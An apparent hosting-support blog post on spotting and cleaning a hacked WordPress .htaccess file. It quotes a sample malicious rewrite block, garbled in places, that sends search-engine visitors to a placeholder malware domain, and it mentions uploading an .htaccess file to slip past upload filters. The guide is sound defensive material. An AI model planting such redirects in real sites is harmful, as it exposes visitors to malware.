Let us take a closer look at the .htaccess file hacked WordPress; issue. At Bobcares our WordPress support service can you a detailed overview of dealing with this security threat.

The htaccess and exploitation

Attackers exploit this file for a variety of purposes, including injecting material, hiding backdoors, and altering php.ini variables, among others. htaccess contains several exploits to circumvent various server security measures, directory limitations, etc.

For example – 

PHP was uploaded to the server, however, It was unable to upload a shell directly or indirectly. Avoid the filters by uploading a.htaccess file instead of shell.png, shell.php;jpg, and so forth. The uploaded htaccess file will overwrite the old one.

Firstly, this is a secret file; as a result, some website owners may not discover it in their FTP programs. And secondly, because it is a strong file, modifying the web server and PHP behavior is simplified. This is one of the most important factors. The htaccess assault is difficult to track and clear up.

WordPress .htaccess Hacked – Types Of Attacks

There are many forms of htaccess attacks some of them are:

1. Hacked:.htaccess redirect – Redirecting consumers away from search engines and into malware.
2. Malware redirection of error pages.
3. Adding malware to the website.
4. Without requiring user participation, browser fingerprinting and IP logging are performed.
5. Watering Hole Attacks

If an attacker successfully gains access to a website and also has restricted access, but has access to make modifications to htaccess, this may be used for a variety of exploitation instances. The Disclosure of Information Another type of attack is the use of htaccess.

How to Determine Whether a Website Is Vulnerable

To accomplish this, keep a tight eye on the website for any unusual redirection. Additionally, make a backup of all.htaccess files to compare to those on the servers. It is also recommended to examine the website for vulnerabilities such as SQL injection and Cross Site Scripting issues. These are flaws that an attacker may exploit to get access to and impact the website, eventually spreading malware to users.

WordPress .htaccess hacked? What to do?

If the above-mentioned redirection is visible, it is advised to inspect the.htaccess files as soon as possible and delete the problematic code. Backdoors are most likely concealed in several folders, therefore perform a thorough cleaning of the entire site, update WordPress, change all passwords, and so on.

WordPress hacked.htaccess cleanup

Here are some crucial steps to thoroughly understanding how to scan the.htaccess files for hacking.

.htaccess hack Cleanup

The first step is to navigate to the cPanel and the Files area, then select File Manager. Click on Settings in the upper right-hand corner. Then, from the drop-down menu, pick Document Root to select an option and the domain. Check the Show Hidden Files box for the files chosen. After that click on Save.

Right-click on the .htaccess file and hit Edit. A text editor encoding dialog box will appear; choose Edit. Take a critical check at the document to look for any disorganized code. If

the .htaccess file has been hacked, the following will be shown.

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .task.com. * $ [NC, OR] RewriteCond % (HTTP_REFERER} .*google.* $ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com* $ [NC, OR] RewriteCond % (HTTP_REFERER} .bing.com* $ [NC, OR] RewriteCond % (HTTP_REFERER} .*live.com* $ [NC, OR] RewriteCond %{HTTP_REFERER} .*aol.com* $ [NC, OR] RewriteCond %{HTTP_REFERER} .*altavista.com* $ [NC, OR] RewriteCond % (HTTP_REFERER} .*excite.com* $ [NC, OR] RewriteCond %{HTTP_REFERER} .*search.yahoo* $ [NC] RewriteRule .* http://Malicious Domain.tld/bad.php?t=3 [R,L]

This rewriting code is attempting to determine the referrer of a request. If it’s a popular online search engine, they’re redirecting it to their Harmful Domain.tld website and doing all they can to load the bad.php malicious script. Such hacks might go unnoticed at times. Unfortunately, the longer they are active, the greater their ability to impact search engine rankings.

To erase these detrimental rewrites, select all of the content and press Delete. After erasing it, go to the top right and click Save Changes to save the file. If unsure whether to have found a malicious redirect code, make a backup of the.htaccess file before making any changes. To accomplish this, right-click on the.htaccess file and select Copy, then select a location like – /public html/.htaccess-BAK, and then click Copy File.

.htaccess Security

Authorization – Deny access by IP

In most cases using Allow IP and Deny IP is better. Mod rewrite, on the other hand, allows to control access by IP address.

RewriteCond %{REMOTE_ADDR} ^205\.209\.177\. RewriteRule .* - [F]

Prevent image hotlinking

RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?example\.com/ [NC]
RewriteRule \.(gif|jpg|jpeg|png)$ - [F]

Protocols – Ensure HTTPS

// based on protocol
RewriteCond %{REQUEST_URI} ^secure_area/
RewriteCond %{HTTPS} !on
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]

// alternative using server port
RewriteCond %{REQUEST_URI} ^secure_area/
RewriteCond %{SERVER_PORT} !^443$
RewriteRule ^(.*)$ https://www.example.com/$1 [R=301,L]

[Need assistance with similar queries? We are here to help]

Conclusion

To conclude there are multiple ways for an attacker to trigger htaccess file hacked wordpress. Following simple steps of security measures, we can effectively blog and prevent attackers from accessing sensitive data.